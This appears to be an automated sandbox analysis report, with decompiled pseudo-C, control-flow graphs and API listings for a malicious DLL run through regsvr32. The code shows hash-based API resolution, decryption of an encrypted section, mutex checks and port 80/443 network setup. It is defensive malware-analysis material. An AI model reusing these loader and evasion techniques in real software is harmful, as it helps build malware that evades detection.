                  				_t5 = _t123 + 4; // 0x4
                  				r12d = _t5;
                  				if (_t100 > 0) goto 0x8000283e;
                  				if (_t100 != 0) goto 0x80002835;
                  				if ( *((char*)(_t153 + 0x74)) - 2 > 0) goto 0x8000283e;
                  				 *((intOrPtr*)(_t164 + 0x90)) = 0;
                  				goto 0x80002846;
                  				 *((intOrPtr*)(_t164 + 0x90)) = r12d;
                  				E0000000118000459C(0x3fe3c8ba, _t119,  *((intOrPtr*)(_t156 + 0x50)));
                  				if (_t119 == _t123) goto 0x80002871;
                  				r9d = 0;
                  				r8d = 0;
                  				 *((intOrPtr*)(_t164 + 0x20)) = 0;
                  				 *_t119(); // executed
                  				goto 0x80002874;
                  				_t120 = _t123;
                  				 *((long long*)(_t153 + 0x28)) = _t120;
                  				HeapFree(_t178, _t176, _t152);
                  				if ( *((intOrPtr*)(_t153 + 0x28)) == _t123) goto 0x80002a78;
                  				if ( *((intOrPtr*)(_t164 + 0xa0)) == 0) goto 0x800028ce;
                  				E0000000118000459C(0xe7f09937, _t120,  *((intOrPtr*)(_t156 + 0x50)));
                  				if (_t120 == _t123) goto 0x800028c4;
                  				_t17 = _t164 + 0xa0; // 0x12
                  				r9d = r12d;
                  				 *_t120();
                  				goto 0x800028c6;
                  				if (0 == 0) goto 0x80002a78;
                  				E00000001180007B04(_t123,  *((intOrPtr*)(_t153 + 8)), _t153, _t156, _t119, _t17, _t155, _t158);
                  				if (_t120 == _t123) goto 0x80002a78;
                  				 *((intOrPtr*)(_t164 + 0x90)) = 0x100;
                  				if ( *((intOrPtr*)(_t164 + 0xb0)) == 0) goto 0x80002938;
                  				 *((intOrPtr*)(_t164 + 0x40)) = 0xaa0;
                  				E0000000118000459C(0xe7f09937, _t120,  *((intOrPtr*)(_t156 + 0x50)));
                  				if (_t120 == _t123) goto 0x80002927;
                  				r9d = r12d;
                  				 *_t120();
                  				asm("bts dword [esp+0x90], 0x17");
                  				r12d = 0x1bb;
                  				goto 0x8000293e;
                  				r12d = 0x50;
                  				E0000000118000459C(0x7dda0345, _t120,  *((intOrPtr*)(_t156 + 0x50)));
                  				if (_t120 == _t123) goto 0x80002963;
                  				r9d = 0;
                  				r8d = r12w & 0xffffffff;
                  				 *_t120();
                  				goto 0x80002966;
                  				_t121 = _t123;
                  				 *((long long*)(_t153 + 0x30)) = _t121;
                  				HeapFree(??, ??, ??);
                  				if ( *((intOrPtr*)(_t153 + 0x30)) == _t123) goto 0x80002a78;
                  				E00000001180007B04(_t123,  *((intOrPtr*)(_t153 + 0x10)), _t153, _t156, _t120, _t120);
                  				_t161 = _t121;
                  				if (_t121 == _t123) goto 0x80002a78;
                  				E0000000118000459C(0xaa9d9fc1, _t121,  *((intOrPtr*)(_t156 + 0x50)));
                  				if (_t121 == _t123) goto 0x800029ed;
                  				_t151 =  !=  ?  *0x8000d490 + 0x180011260 :  *0x8000d490 + 0x180011278;
                  				r9d = 0;
                  				 *((intOrPtr*)(_t164 + 0x30)) =  *((intOrPtr*)(_t164 + 0x90));
                  				 *((long long*)(_t164 + 0x28)) = _t123;
                  				 *((long long*)(_t164 + 0x20)) = _t123;
                  				 *_t121(); // executed
                  				goto 0x800029f0;
                  				_t122 = _t123;
                  				 *((long long*)(_t153 + 0x38)) = _t122;
                  				HeapFree(??, ??, ??);
                  				if ( *((intOrPtr*)(_t153 + 0x38)) == _t123) goto 0x80002a78;
                  				 *((intOrPtr*)(_t164 + 0x44)) = 4;
                  				E0000000118000459C(0x677ec78c, _t122,  *((intOrPtr*)(_t156 + 0x50)));
                  				_t45 = _t161 + 0x1b; // 0x1f
                  				r12d = _t45;
                  				if (_t122 == _t123) goto 0x80002a40;
                  				 *_t122();
                  				goto 0x80002a42;
                  				if (0 == 0) goto 0x80002a80;
                  				asm("bts dword [esp+0x90], 0x8");
                  				E0000000118000459C(0xe7f09937, _t122,  *((intOrPtr*)(_t156 + 0x50)));
                  				if (_t122 == _t123) goto 0x80002a80;
                  				r9d = 4;
                  				 *_t122();
                  				goto 0x80002a80;
                  				return GetLastError();
                  			}
























                  0x1800027d4
                  0x1800027d4
                  0x1800027d9
                  0x1800027e9
                  0x1800027ed
                  0x1800027f4
                  0x180002805
                  0x18000280d
                  0x180002810
                  0x18000281d
                  0x180002823
                  0x180002827
                  0x180002827
                  0x18000282b
                  0x18000282d
                  0x180002833
                  0x180002835
                  0x18000283c
                  0x18000283e
                  0x18000284f
                  0x180002857
                  0x180002860
                  0x180002863
                  0x180002869
                  0x18000286d
                  0x18000286f
                  0x180002871
                  0x18000287c
                  0x180002880
                  0x18000288a
                  0x180002897
                  0x1800028a2
                  0x1800028aa
                  0x1800028b0
                  0x1800028b8
                  0x1800028c0
                  0x1800028c2
                  0x1800028c8
                  0x1800028d4
                  0x1800028df
                  0x1800028e5
                  0x1800028f7
                  0x180002902
                  0x18000290a
                  0x180002912
                  0x18000291d
                  0x180002925
                  0x180002927
                  0x180002930
                  0x180002936
                  0x180002938
                  0x180002947
                  0x18000294f
                  0x180002955
                  0x180002958
                  0x18000295f
                  0x180002961
                  0x180002963
                  0x18000296e
                  0x180002972
                  0x18000297c
                  0x180002988
                  0x18000298d
                  0x180002993
                  0x1800029a2
                  0x1800029aa
                  0x1800029c9
                  0x1800029d4
                  0x1800029d7
                  0x1800029df
                  0x1800029e4
                  0x1800029e9
                  0x1800029eb
                  0x1800029ed
                  0x1800029f8
                  0x1800029fc
                  0x180002a06
                  0x180002a12
                  0x180002a1a
                  0x180002a1f
                  0x180002a1f
                  0x180002a26
                  0x180002a3c
                  0x180002a3e
                  0x180002a44
                  0x180002a46
                  0x180002a58
                  0x180002a60
                  0x180002a6e
                  0x180002a74
                  0x180002a76
                  0x180002a99

                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000003.00000002.701680832.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000003.00000002.701673704.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.701700659.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.701706401.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
                  Similarity
                  • API ID: Heap$Free$AllocErrorLastlstrlenmemset
                  • String ID: P
                  • API String ID: 1242601240-3110715001
                  • Opcode ID: 6e262a4d51cbb5cdb0bca898ebc316c77d6222acc70f3ffea50beea523427e07
                  • Instruction ID: b9b39858d45b2fed8cd52d627653eb03beea5c07a2efbf285fd96505e9c46d20
                  • Opcode Fuzzy Hash: 6e262a4d51cbb5cdb0bca898ebc316c77d6222acc70f3ffea50beea523427e07
                  • Instruction Fuzzy Hash: E2718B7230468897EBA2DF62A8443DA73A0F78DBC4F488425AF4E47B46CF38D658C710
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Control-flow Graph

                  APIs
                  Memory Dump Source
                  • Source File: 00000003.00000002.701680832.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000003.00000002.701673704.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.701700659.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.701706401.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
                  Similarity
                  • API ID: ErrorFileLast$CloseCreateDirectoryHandleInitQueryStringUnicode
                  • String ID:
                  • API String ID: 2375947951-0
                  • Opcode ID: 6a213b4158cada7e0fc9009fce08ec59d8022234906b0ab491453136b5d08942
                  • Instruction ID: 86e8c0801eecd6214d3de86c7c9a3f36e2355b629a028b10123d7888b335a31b
                  • Opcode Fuzzy Hash: 6a213b4158cada7e0fc9009fce08ec59d8022234906b0ab491453136b5d08942
                  • Instruction Fuzzy Hash: A5319E72214B8486D7A1CF15E45439E77A1F78CBD4F588626EAAD43B88DF38CA48CB00
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Control-flow Graph

                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000003.00000002.701680832.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000003.00000002.701673704.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.701700659.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.701706401.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
                  Similarity
                  • API ID: CloseHandleHeapProcess$AllocCreateErrorFreeLastMultipleObjectsTerminateWaitmemset
                  • String ID: h
                  • API String ID: 3316326719-2439710439
                  • Opcode ID: fb432cae3a15b5eaa338603b7acd1f3494cf9eca908a212787e2a653c3defb75
                  • Instruction ID: 097b2738b8004f5ee40f8b7a1758c839ecbf0a38091e65ea8e5fbb9dadc2f9be
                  • Opcode Fuzzy Hash: fb432cae3a15b5eaa338603b7acd1f3494cf9eca908a212787e2a653c3defb75
                  • Instruction Fuzzy Hash: CF318E32704B8986EB95CB56E84479AB3A1F78CBD0F14C135EA9D83B64DF78C548CB00
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 223 180004f1c-180004f57 HeapCreate 224 18000506b-18000508b 223->224 225 180004f5d-180004f73 223->225 226 180004f79-180004f7e 225->226 227 180004ffc 225->227 229 180004f8a-180004f8c 226->229 230 180004f80-180004f88 226->230 228 180005001-180005003 227->228 231 180005005-18000500e HeapDestroy 228->231 232 180005010-180005037 HeapAlloc 228->232 229->227 233 180004f8e-180004fb1 HeapAlloc 229->233 230->226 230->229 231->224 234 180005049-180005064 call 18000236a call 18000508c 232->234 235 180005039-180005047 HeapDestroy 232->235 236 180004fb3-180004ff3 call 180002524 call 180001b48 233->236 237 180004ff5-180004ffa 233->237 244 180005069 234->244 235->224 236->228 237->228 244->224
                  C-Code - Quality: 38%
                  			E00000001180004F1C(long long __rbx, void* __rcx, long long __rdi, long long __rsi, void* __r11) {
                  				intOrPtr _t22;
                  				intOrPtr _t23;
                  				void* _t46;
                  				long long _t56;
                  				void* _t72;
                  				intOrPtr* _t75;
                  				intOrPtr* _t76;
                  				long long _t80;
                  				long long _t82;
                  				void* _t83;
                  				long long _t85;
                  				void* _t91;
                  				void* _t92;
                  				long _t93;
                  				long _t95;
                  				long _t97;
                  
                  				_t92 = __r11;
                  				_t56 = _t85;
                  				 *((long long*)(_t56 + 8)) = __rbx;
                  				 *((long long*)(_t56 + 0x10)) = _t82;
                  				 *((long long*)(_t56 + 0x18)) = __rsi;
                  				 *((long long*)(_t56 + 0x20)) = __rdi;
                  				_t83 = __rcx;
                  				r8d = 0;
                  				HeapCreate(_t97, _t95, _t93); // executed
                  				_t80 = _t56;
                  				if (_t56 == 0) goto 0x8000506b;
                  				_t72 =  *((intOrPtr*)(__rcx + 0x3c)) + __rcx;
                  				_t75 = _t56 + _t72 + 0x68;
                  				_t22 =  *_t75;
                  				if (_t22 == 0) goto 0x80004ffc;
                  				if (_t22 == 0x7373622e) goto 0x80004f8a;
                  				_t76 = _t75 + 0x28;
                  				_t23 =  *_t76;
                  				if (_t23 != 0) goto 0x80004f79;
                  				if (_t23 == 0) goto 0x80004ffc;
                  				r13d =  *(_t76 + 0x10);
                  				r12d =  *(_t76 + 0x14);
                  				r12d = r12d ^  *(_t72 + 8);
                  				r12d = r12d ^ r13d;
                  				HeapAlloc(??, ??, ??);
                  				if (_t56 == 0) goto 0x80004ff5;
                  				r9d = r12d;
                  				r8d = r13d;
                  				E00000001180002524(_t56, __rbx, _t56, _t72 + __rcx, _t80);
                  				r11d =  *((intOrPtr*)(_t76 + 0xc));
                  				 *0x8000d490 = _t56 - _t92 - _t83;
                  				 *0x8000d498 = E00000001180001B48(_t56, _t56 - _t92 - _t83 + 0x80011040);
                  				goto 0x80005001;
                  				goto 0x80005001;
                  				if (2 == 0) goto 0x80005010;
                  				HeapDestroy(??);
                  				goto 0x8000506b;
                  				HeapAlloc(??, ??, ??);
                  				if (0x80011040 != 0) goto 0x80005049;
                  				HeapDestroy(??);
                  				goto 0x8000506b;
                  				0x8000236a();
                  				 *0x180011048 = _t80;
                  				 *0x8000d4a0 = 0x80011040;
                  				return E0000000118000508C(0, _t46, 0x80011040, 0x80011040, _t83, _t91);
                  			}



















                  0x180004f1c
                  0x180004f1c
                  0x180004f1f
                  0x180004f23
                  0x180004f27
                  0x180004f2b
                  0x180004f39
                  0x180004f3c
                  0x180004f4b
                  0x180004f51
                  0x180004f57
                  0x180004f63
                  0x180004f6a
                  0x180004f6f
                  0x180004f73
                  0x180004f7e
                  0x180004f80
                  0x180004f84
                  0x180004f88
                  0x180004f8c
                  0x180004f8e
                  0x180004f92
                  0x180004f99
                  0x180004fa2
                  0x180004fa5
                  0x180004fb1
                  0x180004fb6
                  0x180004fb9
                  0x180004fc2
                  0x180004fc7
                  0x180004fdd
                  0x180004fed
                  0x180004ff3
                  0x180004ffa
                  0x180005003
                  0x180005008
                  0x18000500e
                  0x18000502b
                  0x180005037
                  0x18000503c
                  0x180005047
                  0x180005051
                  0x180005059
                  0x18000505d
                  0x18000508b

                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000003.00000002.701680832.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000003.00000002.701673704.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.701700659.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.701706401.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
                  Similarity
                  • API ID: Heap$AllocDestroy$Create
                  • String ID: .bss
                  • API String ID: 388876957-3890483948
                  • Opcode ID: 5b869ae12754507e5804a63dee81d5c07f3243b930885b44b1c254585407c773
                  • Instruction ID: 17f0f38e5d9243197e023c83d38f09e6848a0c07c4c3a118f17cd0d0cedb6ef9
                  • Opcode Fuzzy Hash: 5b869ae12754507e5804a63dee81d5c07f3243b930885b44b1c254585407c773
                  • Instruction Fuzzy Hash: 68418B72300B4986FB96CB56A8543AA73A0FB4CFD4F04C025EE494BB81DF38DA998710
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 246 180001000-180001057 CreateFileW 247 1800010c8-1800010ce GetLastError 246->247 248 180001059-180001068 GetFileSize 246->248 251 1800010d0-1800010d4 247->251 249 180001071-180001086 HeapAlloc 248->249 250 18000106a-18000106f 248->250 249->247 252 180001088-1800010a7 ReadFile 249->252 250->251 253 1800010d6-1800010d9 CloseHandle 251->253 254 1800010df-1800010e2 251->254 252->247 255 1800010a9-1800010b0 252->255 253->254 256 1800010e4-1800010e6 254->256 257 1800010f6-18000110e 254->257 258 1800010b2-1800010b7 255->258 259 1800010b9-1800010c6 255->259 256->257 260 1800010e8-1800010f0 HeapFree 256->260 258->251 259->251 260->257
                  APIs
                  Memory Dump Source
                  • Source File: 00000003.00000002.701680832.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000003.00000002.701673704.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.701700659.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.701706401.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
                  Similarity
                  • API ID: File$Heap$AllocCloseCreateErrorFreeHandleLastReadSize
                  • String ID:
                  • API String ID: 4260168601-0
                  • Opcode ID: 95c6153764ce9edb243c7aab14e288f80f1312c95db6219c76ea6eb6d084c666
                  • Instruction ID: dbc3ca4fbdf92ddb3d6ab0fb3fd3743db26333d8f93616b96f69221312f2bdc0
                  • Opcode Fuzzy Hash: 95c6153764ce9edb243c7aab14e288f80f1312c95db6219c76ea6eb6d084c666
                  • Instruction Fuzzy Hash: 3431413120478986F7A2CB56A8447DAB6D0B74CBE5F44C325EEA9477D4DF78C68E8B00
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Control-flow Graph

                  APIs
                  • lstrlenA.KERNEL32(?,?,?,?,00000001,00000001800058DA,?,?,?,00000001,00000000,00000000,00000000,00000001800015EA), ref: 000000018000269E
                  • HeapAlloc.KERNEL32(?,?,?,00000001,00000000,00000000,00000000,00000001800015EA), ref: 00000001800026B0
                  • lstrcpyA.KERNEL32(?,?,?,00000001,00000000,00000000,00000000,00000001800015EA), ref: 00000001800026DB
                  • CreateThread.KERNELBASE(?,?,?,00000001,00000000,00000000,00000000,00000001800015EA), ref: 0000000180002715
                  • FindCloseChangeNotification.KERNELBASE(?,?,?,00000001,00000000,00000000,00000000,00000001800015EA), ref: 0000000180002724
                  • GetLastError.KERNEL32(?,?,?,00000001,00000000,00000000,00000000,00000001800015EA), ref: 000000018000272C
                  • HeapFree.KERNEL32(?,?,?,00000001,00000000,00000000,00000000,00000001800015EA), ref: 0000000180002741
                  Memory Dump Source
                  • Source File: 00000003.00000002.701680832.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000003.00000002.701673704.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.701700659.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.701706401.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
                  Similarity
                  • API ID: Heap$AllocChangeCloseCreateErrorFindFreeLastNotificationThreadlstrcpylstrlen
                  • String ID:
                  • API String ID: 855867372-0
                  • Opcode ID: 8f83108d9fd5bf52bbc778f18ae66d6137a75de2933ab538b9230eaa7567e890
                  • Instruction ID: 8ed8152a395896e124fdee7dd42a1db6533dceb9cab86c829ebc78b2e775e80d
                  • Opcode Fuzzy Hash: 8f83108d9fd5bf52bbc778f18ae66d6137a75de2933ab538b9230eaa7567e890
                  • Instruction Fuzzy Hash: 8221AD36604788C6E7A6DF52B84039AB7A0B78CBE0F48C425FE9A47764CF38D649C700
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Control-flow Graph

                  C-Code - Quality: 44%
                  			E00000001180008708(void* __eax, void* __edi, long long __rbx, intOrPtr* __rcx, void* __rdx, void* _a8, char _a16, long long _a24) {
                  				void* _v72;
                  				long long _v88;
                  				void* __rsi;
                  				void* __rbp;
                  				void* _t45;
                  				long long _t46;
                  				long long _t47;
                  				struct _SECURITY_ATTRIBUTES* _t57;
                  				long long _t60;
                  				int _t62;
                  				WCHAR* _t66;
                  				void* _t69;
                  				void* _t76;
                  				void* _t79;
                  
                  				_t47 = __rbx;
                  				_t45 = _t69;
                  				 *((long long*)(_t45 + 8)) = __rbx;
                  				r9d = 0;
                  				 *((intOrPtr*)(_t45 - 0x48)) = 0x18;
                  				 *((intOrPtr*)(_t45 - 0x38)) = 0;
                  				0x800085dc(); // executed
                  				if (__eax == 0) goto 0x800087f7;
                  				_a16 =  *__rcx;
                  				_t46 =  &_a24;
                  				r9d = 0;
                  				_v88 = _t46;
                  				E000000011800030C8(__edi, __rbx,  &_a16,  *0x8000d490, __rcx,  *0x8000d490 + 0x180011188, _t79, _t76);
                  				if (_t46 == _t47) goto 0x800087f7;
                  				E0000000118000459C(0x3ff22481, _t46,  *((intOrPtr*)( *0x8000d4a0 + 0x18)));
                  				if (_t46 == _t47) goto 0x800087c0;
                  				CreateMutexW(_t57, _t62, _t66); // executed
                  				goto 0x800087c3;
                  				_t60 = _t47;
                  				if (_t60 == _t47) goto 0x800087e9;
                  				if (GetLastError() != 0xb7) goto 0x800087e0;
                  				CloseHandle(??);
                  				goto 0x800087e9;
                  				_a24 = _t60;
                  				HeapFree(??, ??, ??);
                  				return 1;
                  			}

















                  0x180008708
                  0x180008708
                  0x18000870b
                  0x180008747
                  0x18000874a
                  0x180008751
                  0x180008754
                  0x18000875b
                  0x18000876f
                  0x180008776
                  0x180008786
                  0x180008789
                  0x18000878e
                  0x180008799
                  0x1800087a4
                  0x1800087ac
                  0x1800087b9
                  0x1800087be
                  0x1800087c0
                  0x1800087c6
                  0x1800087d3
                  0x1800087d8
                  0x1800087de
                  0x1800087e0
                  0x1800087f1
                  0x18000880c

                  APIs
                  Memory Dump Source
                  • Source File: 00000003.00000002.701680832.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000003.00000002.701673704.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.701700659.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.701706401.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
                  Similarity
                  • API ID: ErrorHeapLastmemcpy$AllocCloseCreateFreeHandleMutexlstrlen
                  • String ID:
                  • API String ID: 3861850634-0
                  • Opcode ID: 91fca6edbb480d4a463791ea284bd5c18021fdd31d2df17c4dd4c6e232cc3c69
                  • Instruction ID: 127f5c0fcc647b7374bd47b38eb5124d32550bc361860966e3f5016e667268f0
                  • Opcode Fuzzy Hash: 91fca6edbb480d4a463791ea284bd5c18021fdd31d2df17c4dd4c6e232cc3c69
                  • Instruction Fuzzy Hash: B621593220468996EBA1CF52E8407D977A1FB8CBC8F588426EF4D47B49DE34D64EC740
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 377 180006008-180006063 lstrlenA RtlAllocateHeap 378 180006069-1800060c5 _snprintf 377->378 379 1800060eb-180006107 377->379 380 1800060e5-1800060e7 378->380 381 1800060c7-1800060ca 378->381 380->379 382 1800060d4-1800060e3 lstrcpyA 381->382 383 1800060cc-1800060d0 381->383 382->379 383->382
                  APIs
                  Memory Dump Source
                  • Source File: 00000003.00000002.701680832.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000003.00000002.701673704.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.701700659.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.701706401.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
                  Similarity
                  • API ID: AllocateHeap_snprintflstrcpylstrlen
                  • String ID:
                  • API String ID: 2809993405-0
                  • Opcode ID: d259640750b129b37f8796bde76c5520b807ee9fb10f6e5ed3310e5deffcfd7e
                  • Instruction ID: cd8941c1faf9c1b72c5725e61722f5b4f1580fba6f0a1dbc367b270ebdb23bd2
                  • Opcode Fuzzy Hash: d259640750b129b37f8796bde76c5520b807ee9fb10f6e5ed3310e5deffcfd7e
                  • Instruction Fuzzy Hash: 83316B36604B888BD7A5CF16E454B9AB7A5F38CBC4F048126EE9E83714DF39D545CB00
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 384 180007b94-180007be5 385 180007da3 384->385 386 180007beb-180007bf3 384->386 388 180007da8-180007db8 385->388 386->385 387 180007bf9-180007c24 RtlAllocateHeap 386->387 389 180007c2a-180007c63 memset 387->389 390 180007d9c-180007da1 387->390 391 180007c69-180007c93 389->391 392 180007d6d-180007d85 389->392 390->388 394 180007c98-180007c9b 391->394 396 180007d87-180007d8a 392->396 397 180007d8c-180007d9a HeapFree 392->397 394->392 395 180007ca1-180007caa 394->395 398 180007cd6-180007ce7 395->398 399 180007cac-180007cd1 call 180008c48 395->399 396->388 397->388 401 180007ce9-180007ced 398->401 402 180007d1d-180007d68 398->402 399->398 404 180007cfa-180007d02 401->404 405 180007cef-180007cf8 401->405 402->394 406 180007d07-180007d0e 404->406 405->406 406->401 407 180007d10-180007d18 406->407 407->402
                  APIs
                  • RtlAllocateHeap.NTDLL(?,?,?,?,?,?,?,?,?,00000000,?,?,0000000180008B7D,?,?,00000000), ref: 0000000180007C13
                  • memset.NTDLL(?,?,?,?,?,?,?,?,?,00000000,?,?,0000000180008B7D,?,?,00000000), ref: 0000000180007C35
                  Memory Dump Source
                  • Source File: 00000003.00000002.701680832.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000003.00000002.701673704.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.701700659.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.701706401.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
                  Similarity
                  • API ID: AllocateHeapmemset
                  • String ID:
                  • API String ID: 669713250-0
                  • Opcode ID: 231eb40ae42393b3803f541fbe69a0b1f40d2ddbec7427b92020bbe0007c72ff
                  • Instruction ID: b8eae849a3001c6edc556b20ee36b044cea257758f74ce9d79c82757b9587b00
                  • Opcode Fuzzy Hash: 231eb40ae42393b3803f541fbe69a0b1f40d2ddbec7427b92020bbe0007c72ff
                  • Instruction Fuzzy Hash: 7F518C72B04B8486E7A6CB05E444B9AB7B1FB98BD4F508116EE8D43B54DF38C9A5CB00
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 408 18000702c-180007056 call 18000459c 411 180007074 408->411 412 180007058-180007068 408->412 413 180007076-180007078 411->413 414 180007072 412->414 415 18000707a-18000708b call 18000459c 413->415 416 1800070ce-1800070d4 GetLastError 413->416 414->413 422 18000708d-18000709c 415->422 423 18000709e 415->423 418 1800070d6-1800070d8 416->418 420 1800070e9-1800070fa 418->420 421 1800070da-1800070e7 call 180004cfc 418->421 421->420 426 1800070a0-1800070a2 422->426 423->426 427 1800070a4-1800070a6 426->427 428 1800070a8-1800070ae GetLastError 426->428 430 1800070b0-1800070c1 call 18000459c 427->430 428->430 430->418 433 1800070c3-1800070cc 430->433 433->418
                  C-Code - Quality: 40%
                  			E0000000118000702C(void* __ebx, long long* __rax, long long __rbx, void* __rcx, long long __rsi, long long _a8, long long _a16, void* _a24) {
                  				intOrPtr _v24;
                  				long long* _t42;
                  
                  				_t42 = __rax;
                  				_a8 = __rbx;
                  				_a16 = __rsi;
                  				_t53 =  *0x8000d4a0;
                  				E0000000118000459C(0x4e1c2e77, __rax,  *((intOrPtr*)( *0x8000d4a0 + 0x20)));
                  				if (_t42 == 0) goto 0x80007074;
                  				r9d = 1;
                  				r8d = 0;
                  				_v24 = 0xf0000040;
                  				 *_t42(); // executed
                  				goto 0x80007076;
                  				if (0 == 0) goto 0x800070ce;
                  				E0000000118000459C(0xc506923c, _t42,  *((intOrPtr*)( *0x8000d4a0 + 0x20)));
                  				if (_t42 == 0) goto 0x8000709e;
                  				 *_t42();
                  				goto 0x800070a0;
                  				if (0 == 0) goto 0x800070a8;
                  				goto 0x800070b0;
                  				GetLastError();
                  				E0000000118000459C(0xbaca8f4d, _t42,  *((intOrPtr*)(_t53 + 0x20)));
                  				if (_t42 == 0) goto 0x800070d6;
                  				 *_t42();
                  				goto 0x800070d6;
                  				if (GetLastError() == 0) goto 0x800070e9;
                  				return E00000001180004CFC(4, __rbx, __rcx);
                  			}





                  0x18000702c
                  0x18000702c
                  0x180007031
                  0x18000703b
                  0x18000704e
                  0x180007056
                  0x18000705d
                  0x180007063
                  0x180007068
                  0x180007070
                  0x180007072
                  0x180007078
                  0x180007083
                  0x18000708b
                  0x18000709a
                  0x18000709c
                  0x1800070a2
                  0x1800070a6
                  0x1800070a8
                  0x1800070b9
                  0x1800070c1
                  0x1800070ca
                  0x1800070cc
                  0x1800070d8
                  0x1800070fa

                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000003.00000002.701680832.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000003.00000002.701673704.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.701700659.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.701706401.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
                  Similarity
                  • API ID: ErrorLast
                  • String ID: @
                  • API String ID: 1452528299-2766056989
                  • Opcode ID: 3d7c3c247832b170b47bab491a8084ec548c7f0c1147f1404c92e67fe32440c0
                  • Instruction ID: ac7bd9da6f2b9285d8b03cb53e6a872d64b1fe26a18dfc81d45ef4acb4719aca
                  • Opcode Fuzzy Hash: 3d7c3c247832b170b47bab491a8084ec548c7f0c1147f1404c92e67fe32440c0
